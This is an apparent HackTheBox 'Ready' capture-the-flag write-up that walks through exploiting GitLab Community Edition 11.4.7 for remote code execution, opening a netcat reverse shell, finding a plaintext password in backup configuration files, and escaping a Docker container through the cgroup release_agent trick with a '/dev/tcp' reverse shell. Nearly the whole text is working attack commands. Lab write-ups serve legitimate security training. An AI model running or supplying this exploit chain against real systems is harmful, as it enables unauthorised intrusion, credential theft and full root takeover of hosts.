HackTheBox-Ready WriteUp

HackTheBox-Ready WriteUp

IP:10.10.10.220
Nmap

port:22
SSH
port:5080
http://10.10.10.220:5080/users/sign_in #GitLab Community Edition 11.4.7 (RCE)

Build Exploit :

https://www.exploit-db.com/exploits/49334

#-P need change to other thing cuz the -p will be -P,i change it to -port
parser.add_argument(‘-port’, help=’reverse shell port’, required=True)
local_port = args.port # change it to port too
nc {local_ip} {local_port} -e /bin/bash #need change

Foothold

nc -lvvp port
python3 gitlab11.4.7.py -u username -p password -g http://10.10.10.220 -l ip -port port
python3 -c ‘import pty;pty.spawn(“/bin/bash”)’

User

cd /home/ #Found the username
/home/dude
#user
dude/user.txt

Enum Root
1
2
python3 -m http.server 8080
wget http://ip:port/linpeas.sh #run script and look like we in docker

need enum more things.

Enum local

/opt/backup/* #Found
cat ./* | grep “passw”
gitlab_rails[‘smtp_password’] = “wW59U!ZKMbG9+#h” #test for su users
wW59U!ZKMbG9+#h #docker root passowd

Docker escape

https://book.hacktricks.xyz/linux-unix/privilege-escalation/docker-breakout

1
2
3
4
5
6
7
8
9
10
11
12
13
# In the container
mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x
echo 1 > /tmp/cgrp/x/notify_on_release
host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
echo "$host_path/cmd" > /tmp/cgrp/release_agent

#We use Reverse shell
echo '#!/bin/bash' > /cmd
echo "bash -i >& /dev/tcp/ip/port 0>&1" >> /cmd
chmod a+x /cmd
#===================================
nc -lvvp 4444 #for attacker
sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs" #get root